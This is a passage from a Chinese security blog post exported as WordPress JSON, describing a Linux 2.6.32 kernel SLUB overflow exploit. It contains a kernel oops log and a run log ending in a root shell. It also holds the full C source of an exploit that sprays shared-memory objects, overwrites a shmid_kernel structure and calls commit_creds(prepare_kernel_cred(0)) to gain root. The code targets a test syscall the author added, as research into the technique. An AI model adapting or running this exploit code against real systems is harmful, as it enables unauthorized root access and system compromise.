snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ide_cd_mod button cdrom snd_pcm rtc_cmos serio_raw rtc_core rtc_lib snd_timer 8139too floppy snd 8139cp soundcore i2c_piix4 mii snd_page_alloc i2c_core pcspkr dm_snapshot dm_zero dm_mirror dm_region_hash dm_log dm_mod ata_piix libata sd_mod scsi_mod ext3 jbd uhci_hcd ohci_hcd ehci_hcd [last unloaded: microcode]\r\n\r\nPid: 3190, comm: exp Not tainted (2.6.32 #2) Bochs\r\nEIP: 0060:[&lt;c04fc352&gt;] EFLAGS: 00010246 CPU: 1\r\nEIP is at ipc_has_perm+0x46\/0x61\r\nEAX: 00000000 EBX: 00000000 ECX: 00000000 EDX: d3175428\r\nESI: 000001f0 EDI: d33ebf30 EBP: 00000080 ESP: d33ebec8\r\n DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068\r\nProcess exp (pid: 3190, ti=d33eb000 task=dbe6ea30 task.ti=d33eb000)\r\nStack:\r\n d3175428 d33ebed0 00000004 00000000 00000000 00000000 00000000 00000000\r\n&lt;0&gt; 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000\r\n&lt;0&gt; 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000\r\nCall Trace:\r\n [&lt;c04f9cf3&gt;] ? security_ipc_permission+0xf\/0x10\r\n [&lt;c04f22e4&gt;] ? do_shmat+0xdc\/0x349\r\n [&lt;c04057da&gt;] ? sys_ipc+0xff\/0x162\r\n [&lt;c0402865&gt;] ? syscall_call+0x7\/0xb\r\nCode: 8c e4 82 c0 8b 92 d8 02 00 00 89 c7 8b 52 58 8b 72 04 31 d2 89 44 24 04 89 d0 f3 ab 8b 14 24 c6 44 24 08 04 8b 42 0c 89 44 24 10 &lt;0f&gt; b7 0b 8d 44 24 08 8b 53 04 50 89 f0 55 e8 75 fb ff ff 83 c4\r\nEIP: [&lt;c04fc352&gt;] ipc_has_perm+0x46\/0x61 SS:ESP 0068:d33ebec8\r\nCR2: 0000000000000000\r\n---[ end trace 7bbab7e881899412 ]---\r\n[wzt@localhost exp]$\r\n-------------------------------------------------------------------------------\r\n\r\n    \u770b\u4e0a\u53bb\u50cfselinux\u7684\u95ee\u9898\uff0c\u5c06\u5b83\u5173\u95ed\u6389\u518d\u8bd5\u8bd5\uff1a\r\n\r\n-------------------------------------------------------------------------------\r\n[wzt@localhost exp]$ .\/exp\r\n[+] mmaping kernel code at 0x41414141 ok.\r\n[+] looking for symbols...\r\n[+] found commit_creds addr at 0xc0446524.\r\n[+] found prepare_kernel_cred addr at 0xc0446710.\r\n[+] setting up exploit payload...\r\n[+] checking slab total: 798 active: 791 free: 7\r\n[+] smashing free slab ...\r\n[+] smashing 5 total: 798 active: 798 free: 0\r\n[+] smashing adjacent slab ...\r\n[+] smashing 105 total: 924 active: 924 free: 0\r\n[+] free exist shmid with idx: 101\r\n[+] trigger kmalloc overflow in kmalloc-96\r\n[+] shmid_kernel size: 80\r\n[+] kern_ipc_perm size: 44\r\n[+] shmid: 3309669\r\n[+] launching root shell!\r\n[root@localhost exp]# uname -a\r\nLinux localhost.localdomain 2.6.32 #2 SMP Thu Dec 23 14:59:36 CST 2010 i686 i686 i386 GNU\/Linux\r\n[root@localhost exp]#\r\n-------------------------------------------------------------------------------\r\n\r\n    \u6210\u529f\u4e86\uff0c\u7ec8\u4e8e\u5f97\u5230\u53ef\u7231\u7684root\u4e86\uff01 \r\n\r\n\u4e94\u3001\u6e90\u7801\uff1a\r\n\r\nexp.c\r\n\/*\r\n * linux kernel slub overflow test exploit\r\n *\r\n * by wzt\t&lt;wzt.wzt@gmail.com&gt;\r\n *\r\n *\/\r\n\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;unistd.h&gt;\r\n#include &lt;fcntl.h&gt;\r\n#include &lt;limits.h&gt;\r\n#include &lt;inttypes.h&gt;\r\n#include &lt;sys\/types.h&gt;\r\n#include &lt;sys\/ipc.h&gt;\r\n#include &lt;sys\/sem.h&gt;\r\n#include &lt;sys\/shm.h&gt;\r\n#include &lt;sys\/mman.h&gt;\r\n#include &lt;sys\/stat.h&gt;\r\n\r\n#include \"syscalls.h\"\r\n\r\n#define __NR_kmalloc_overflow_test\t59\r\n\r\n#define KALLSYMS_NAME\t\t\t\"\/proc\/kallsyms\"\r\n#define SLAB_NAME\t\t\t\"kmalloc-96\"\r\n#define SLAB_SIZE\t\t\t96\r\n#define SLAB_NUM\t\t\t100\r\n\r\n#define IPCMNI\t\t\t\t32768\r\n#define EIDRM\t\t\t\t43\r\n#define HDRLEN_KMALLOC\t\t\t8\r\n\r\nstruct list_head {\r\n\tstruct list_head *next;\r\n\tstruct list_head *prev;\r\n};\r\n\r\nstruct super_block {\r\n\tstruct list_head s_list;\r\n\tunsigned int s_dev;\r\n\tunsigned long s_blocksize;\r\n\tunsigned char s_blocksize_bits;\r\n\tunsigned char s_dirt;\r\n\tuint64_t s_maxbytes;\r\n\tvoid *s_type;\r\n\tvoid *s_op;\r\n\tvoid *dq_op;\r\n\tvoid *s_qcop;\r\n\tvoid *s_export_op;\r\n\tunsigned long s_flags;\r\n}super_block;\r\n\r\nstruct mutex {\r\n\tunsigned int count;\r\n\tunsigned int wait_lock;\r\n\tstruct list_head wait_list;\r\n\tvoid *owner;\r\n};\r\n\r\nstruct inode {\r\n\tstruct list_head i_hash;\r\n\tstruct list_head i_list;\r\n\tstruct list_head i_sb_list;\r\n\tstruct list_head i_dentry_list;\r\n\tunsigned long i_ino;\r\n\tunsigned int i_count;\r\n\tunsigned int i_nlink;\r\n\tunsigned int i_uid;\r\n\tunsigned int i_gid;\r\n\tunsigned int i_rdev;\r\n\tuint64_t i_version;\r\n\tuint64_t i_size;\r\n\tunsigned int i_size_seqcount;\r\n\tlong i_atime_tv_sec;\r\n\tlong i_atime_tv_nsec;\r\n\tlong i_mtime_tv_sec;\r\n\tlong i_mtime_tv_nsec;\r\n\tlong i_ctime_tv_sec;\r\n\tlong i_ctime_tv_nsec;\r\n\tuint64_t i_blocks;\r\n\tunsigned int i_blkbits;\r\n\tunsigned short i_bytes;\r\n\tunsigned short i_mode;\r\n\tunsigned int i_lock;\r\n\tstruct mutex i_mutex;\r\n\tunsigned int i_alloc_sem_activity;\r\n\tunsigned int i_alloc_sem_wait_lock;\r\n\tstruct list_head i_alloc_sem_wait_list;\r\n\tvoid *i_op;\r\n\tvoid *i_fop;\r\n\tstruct super_block *i_sb;\r\n\tvoid *i_flock;\r\n\tvoid *i_mapping;\r\n\tchar i_data[84];\r\n\tvoid *i_dquot_1;\r\n\tvoid *i_dquot_2;\r\n\tstruct list_head i_devices;\r\n\tvoid *i_pipe_union;\r\n\tunsigned int i_generation;\r\n\tunsigned int i_fsnotify_mask;\r\n\tvoid *i_fsnotify_mark_entries;\r\n\tstruct list_head inotify_watches;\r\n\tstruct mutex inotify_mutex;\r\n}inode;\r\n\r\nstruct dentry {\r\n\tunsigned int d_count;\r\n\tunsigned int d_flags;\r\n\tunsigned int d_lock;\r\n\tint d_mounted;\r\n\tvoid *d_inode;\r\n\tstruct list_head d_hash;\r\n\tvoid *d_parent;\r\n}dentry;\r\n\r\nstruct file_operations {\r\n\tvoid *owner;\r\n\tvoid *llseek;\r\n\tvoid *read;\r\n\tvoid *write;\r\n\tvoid *aio_read;\r\n \tvoid *aio_write;\r\n\tvoid *readdir;\r\n\tvoid *poll;\r\n\tvoid *ioctl;\r\n\tvoid *unlocked_ioctl;\r\n\tvoid *compat_ioctl;\r\n\tvoid *mmap;\r\n\tvoid *open;\r\n\tvoid *flush;\r\n\tvoid *release;\r\n\tvoid *fsync;\r\n\tvoid *aio_fsync;\r\n\tvoid *fasync;\r\n\tvoid *lock;\r\n\tvoid *sendpage;\r\n\tvoid *get_unmapped_area;\r\n\tvoid *check_flags;\r\n\tvoid *flock;\r\n\tvoid *splice_write;\r\n\tvoid *splice_read;\r\n\tvoid *setlease;\r\n}op;\r\n\r\nstruct vfsmount {\r\n\tstruct list_head mnt_hash;\r\n\tvoid *mnt_parent;\r\n\tvoid *mnt_mountpoint;\r\n\tvoid *mnt_root;\r\n\tvoid *mnt_sb;\r\n\tstruct list_head mnt_mounts;\r\n\tstruct list_head mnt_child;\r\n\tint mnt_flags;\r\n\tconst char *mnt_devname;\r\n\tstruct list_head mnt_list;\r\n\tstruct list_head mnt_expire;\r\n\tstruct list_head mnt_share;\r\n\tstruct list_head mnt_slave_list;\r\n\tstruct list_head mnt_slave;\r\n\tstruct vfsmount *mnt_master;\r\n\tstruct mnt_namespace *mnt_ns;\r\n\tint mnt_id;\r\n\tint mnt_group_id;\r\n\tint mnt_count;\r\n}vfsmount;\r\n\r\nstruct file {\r\n\tstruct list_head fu_list;\r\n\tstruct vfsmount *f_vfsmnt;\r\n\tstruct dentry *f_dentry;\r\n\tvoid *f_op;\r\n\tunsigned int f_lock;\r\n\tunsigned long f_count;\r\n}file;\r\n\r\nstruct kern_ipc_perm {\r\n\tunsigned int lock;\r\n\tint deleted;\r\n\tint id;\r\n\tunsigned int key;\r\n\tunsigned int uid;\r\n\tunsigned int gid;\r\n\tunsigned int cuid;\r\n\tunsigned int cgid;\r\n\tunsigned int mode;\r\n\tunsigned int seq;\r\n\tvoid *security;\r\n};  \r\n\r\nstruct shmid_kernel {\r\n\tstruct kern_ipc_perm shm_perm;\r\n\tstruct file *shm_file;\r\n\tunsigned long shm_nattch;\r\n\tunsigned long shm_segsz;\r\n\ttime_t shm_atim;\r\n\ttime_t shm_dtim;\r\n\ttime_t shm_ctim;\r\n\tunsigned int shm_cprid;\r\n\tunsigned int shm_lprid;\r\n\tvoid *mlock_user;\r\n}shmid_kernel;\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\nstatic inline my_syscall2(long, kmalloc_overflow_test, char *, addr, int, size);\r\n\r\nint __attribute__((regparm(3)))\r\nkernel_code(struct file *file, void *vma)\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\treturn -1;\r\n}\r\n\r\nunsigned long find_symbol_by_proc(char *file_name, char *symbol_name)\r\n{\r\n        FILE *s_fp;\r\n        char buff[200];\r\n        char *p = NULL, *p1 = NULL;\r\n        unsigned long addr = 0;\r\n\r\n        s_fp = fopen(file_name, \"r\");\r\n        if (s_fp == NULL) {\r\n                printf(\"open %s failed.\r\n\", file_name);\r\n                return 0;\r\n        }\r\n\r\n        while (fgets(buff, 200, s_fp) != NULL) {\r\n                if (strstr(buff, symbol_name) != NULL) {\r\n                        buff[strlen(buff) - 1] = \"\ufffd\";\r\n                        p = strchr(strchr(buff, \" \") + 1, \" \");\r\n                        ++p;\r\n\r\n                        if (!p) {\r\n                                return 0;\r\n                        }\r\n                        if (!strcmp(p, symbol_name)) {\r\n                                p1 = strchr(buff, \" \");\r\n                                *p1 = \"\ufffd\";\r\n                                sscanf(buff, \"%lx\", &amp;addr);\r\n                                \/\/addr = strtoul(buff, NULL, 16);\r\n                                printf(\"[+] found %s addr at 0x%x.\r\n\",\r\n                                        symbol_name, addr);\r\n                                break;\r\n                        }\r\n                }\r\n        }\r\n\r\n        fclose(s_fp);\r\n        return addr;\r\n}\r\n\r\nint check_slab(char *slab_name, int *active, int *total)\r\n{\r\n\tFILE *fp;\r\n\tchar buff[1024], name[64];\r\n\tint active_num, total_num;\r\n\r\n\tfp = fopen(\"\/proc\/slabinfo\", \"r\");\r\n\tif (!fp) {\r\n\t\tperror(\"fopen\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\twhile (fgets(buff, 1024, fp) != NULL) {\r\n\t\tsscanf(buff, \"%s %u %u\", name, &amp;active_num, &amp;total_num);\r\n\t\tif (!strcmp(slab_name, name)) {\r\n\t\t\t*active = active_num;\r\n\t\t\t*total = total_num;\r\n\t\t\treturn total_num - active_num;\r\n\t\t}\r\n\t}\r\n\r\n\treturn -1;\r\n}\r\n\r\nvoid clear_old_shm(void)\r\n{\r\n\tchar *cmd = \"for shmid in `cat \/proc\/sysvipc\/shm | awk \"{print $2}\"`; \"\r\n\t\t    \"do ipcrm -m $shmid &gt; \/dev\/null 2&gt;&amp;1; done;\";\r\n\r\n\tsystem(cmd);\r\n}\r\n\r\nvoid mmap_init(void)\r\n{\r\n\tvoid *payload;\r\n\r\n        payload = mmap((void *)(0x41414141 &amp; ~0xfff), 2 * 4096,\r\n                       PROT_READ | PROT_WRITE | PROT_EXEC,\r\n                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);\r\n        if ((long)payload == -1) {\r\n                printf(\"[*] Failed to mmap() at target address.\r\n\");\r\n                return ;\r\n        }\r\n\tprintf(\"[+] mmaping kernel code at 0x41414141 ok.\r\n\");\r\n        memcpy((void *)0x41414141, &amp;kernel_code, 1024);\r\n\r\n}\r\n\r\nvoid setup(void)\r\n{\r\n\tprintf(\"[+] looking for symbols...\r\n\");\r\n\r\n\tcommit_creds = (_commit_creds)\r\n\t\tfind_symbol_by_proc(KALLSYMS_NAME, \"commit_creds\");\r\n    \tif (!commit_creds) {\r\n\t\tprintf(\"[-] not found commit_creds addr.\r\n\");\r\n\t\treturn ;\r\n    \t}\r\n\r\n\tprepare_kernel_cred =\r\n\t\t(_prepare_kernel_cred)find_symbol_by_proc(KALLSYMS_NAME,\r\n\t\t\"prepare_kernel_cred\");\r\n    \tif (!prepare_kernel_cred) {\r\n\t\tprintf(\"[-] not found prepare_kernel_cred addr.\r\n\");\r\n\t\treturn ;\r\n    \t}\r\n\r\n\tprintf(\"[+] setting up exploit payload...\r\n\");\r\n\r\n\tsuper_block.s_flags = 0;\r\n\r\n    \tinode.i_size = 4096;\r\n    \tinode.i_sb = &amp;super_block;\r\n    \tinode.inotify_watches.next = &amp;inode.inotify_watches;\r\n    \tinode.inotify_watches.prev = &amp;inode.inotify_watches;\r\n    \tinode.inotify_mutex.count = 1;\r\n\r\n    \tdentry.d_count = 4096;\r\n    \tdentry.d_flags = 4096;\r\n    \tdentry.d_parent = NULL;\r\n    \tdentry.d_inode = &amp;inode;\r\n\r\n    \top.mmap = &amp;kernel_code;\r\n    \top.get_unmapped_area = &amp;kernel_code;\r\n\r\n    \tvfsmount.mnt_flags = 0;\r\n    \tvfsmount.mnt_count = 1;\r\n\r\n    \tfile.fu_list.prev = &amp;file.fu_list;\r\n    \tfile.fu_list.next = &amp;file.fu_list;\r\n    \tfile.f_dentry = &amp;dentry;\r\n    \tfile.f_vfsmnt = &amp;vfsmount;\r\n    \tfile.f_op = &amp;op;\r\n\r\n    \tshmid_kernel.shm_perm.key = IPC_PRIVATE;\r\n    \tshmid_kernel.shm_perm.uid = 501;\r\n    \tshmid_kernel.shm_perm.gid = 501;\r\n    \tshmid_kernel.shm_perm.cuid = getuid();\r\n    \tshmid_kernel.shm_perm.cgid = getgid();\r\n    \tshmid_kernel.shm_perm.mode = -1;\r\n    \tshmid_kernel.shm_file = &amp;file;\r\n}\r\n\r\nint trigger(void)\r\n{\r\n\tint *shmids;\r\n\tint total_num, active_num, free_num;\r\n\tint base, free_idx, i;\r\n\tint ret;\r\n\tchar buff[1024];\r\n\r\n\tclear_old_shm();\r\n\r\n\tfree_num = check_slab(SLAB_NAME, &amp;active_num, &amp;total_num);\r\n\tfprintf(stdout, \"[+] checking slab total: %d active: %d free: %d\r\n\",\r\n\t\ttotal_num, active_num, total_num - active_num);\r\n\r\n\tshmids = malloc(sizeof(int) * (free_num + SLAB_NUM * 3));\r\n\r\n\tfprintf(stdout, \"[+] smashing free slab ...\r\n\");\r\n\tfor (i = 0; i &lt; free_num + SLAB_NUM; i++) {\r\n\t\tif (!check_slab(SLAB_NAME, &amp;active_num, &amp;total_num))\r\n\t\t\tbreak;\r\n\r\n\t\tshmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n\t\tif (shmids[i] &lt; 0) {\r\n\t\t\tperror(\"shmget\");\r\n\t\t\treturn -1;\r\n\t\t}\r\n\t}\r\n\tbase = i;\r\n        fprintf(stdout, \"[+] smashing %d total: %d active: %d free: %d\r\n\",\r\n                i, total_num, active_num, total_num - active_num);\r\n\r\n\tfprintf(stdout, \"[+] smashing adjacent slab ...\r\n\");\r\n\ti = base;\r\n\tfor (; i &lt; base + SLAB_NUM; i++) {\r\n                shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n                if (shmids[i] &lt; 0) {\r\n                        perror(\"shmget\");\r\n                        return -1;\r\n                }\r\n\t}\r\n\tcheck_slab(SLAB_NAME, &amp;active_num, &amp;total_num);\r\n        fprintf(stdout, \"[+] smashing %d total: %d active: %d free: %d\r\n\",\r\n                i, total_num, active_num, total_num - active_num);\r\n\r\n\t\/\/free_idx = base + SLAB_NUM - 4;\r\n\tfree_idx = i - 4;\r\n\tfprintf(stdout, \"[+] free exist shmid with idx: %d\r\n\", free_idx);\r\n\tif (shmctl(shmids[free_idx], IPC_RMID, NULL) == -1) {\r\n\t\tperror(\"shmctl\");\r\n\t}\r\n\r\n\tsleep(1);\r\n\r\n\tfprintf(stdout, \"[+] trigger kmalloc overflow in %s\r\n\", SLAB_NAME);\r\n\tmemset(buff, 0x41, sizeof(buff));\r\n\tshmid_kernel.shm_perm.seq = shmids[free_idx + 1] \/ IPCMNI;\r\n\tmemcpy(&amp;buff[SLAB_SIZE + HDRLEN_KMALLOC], &amp;shmid_kernel, sizeof(shmid_kernel));\r\n\t\/\/memcpy(&amp;buff[SLAB_SIZE], &amp;shmid_kernel, sizeof(shmid_kernel));\r\n\r\n\tprintf(\"[+] shmid_kernel size: %d\r\n\", sizeof(shmid_kernel));\r\n\tprintf(\"[+] kern_ipc_perm size: %d\r\n\", sizeof(struct kern_ipc_perm));\r\n\tprintf(\"[+] shmid: %d\r\n\", shmids[free_idx]);\r\n\r\n\tkmalloc_overflow_test(buff, SLAB_SIZE + HDRLEN_KMALLOC + sizeof(shmid_kernel));\r\n\r\n\tret = (int)shmat(shmids[free_idx + 1], NULL, SHM_RDONLY);\r\n\tif (ret == -1 &amp;&amp; errno != EIDRM) {\r\n\t\tsetresuid(0, 0, 0);\r\n\t\tsetresgid(0, 0, 0);\r\n\r\n\t\tprintf(\"[+] launching root shell!\r\n\");\r\n\r\n\t\texecl(\"\/bin\/bash\", \"\/bin\/bash\", NULL);\r\n\t\texit(0);\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\nint main(void)\r\n{\r\n\tmmap_init();\r\n\tsetup();\r\n\ttrigger();\r\n}\r\n\r\n\u516d\u3001\u53c2\u8003\r\n\r\n1\u3001 Jon Oberheide - Linux Kernel CAN SLUB Overflow\r\n2\u3001 grip2 - Linux \u5185\u6838\u6ea2\u51fa\u7814\u7a76\u7cfb\u5217(2) - kmalloc \u6ea2\u51fa\u6280\u672f\r\n3\u3001 qobaiashi - the sotry of exploiting kmalloc() overflows\r\n4\u3001 Ramon de Carvalho Valle - Linux Slab Allocator Bu_er Overow Vulnerabilities\r\n5\u3001 wzt - How to Exploit Linux Kernel NULL Pointer Dereference\r\n6\u3001 wzt - Linux kernel stack and heap exploitation\r\n\r\n-EOF-<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Linux Kernel Slub Overflow By wz &hellip;<\/p>\n<p class=\"read-more\"><a href=\"http:\/\/zerobox.org\/notes\/402.html\">\u7ee7\u7eed\u9605\u8bfb &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[29],"class_list":["post-402","post","type-post","status-publish","format-standard","hentry","tag-linux-2"],"views":1002,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/402","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=402"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/402\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=402"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=402"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=402"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}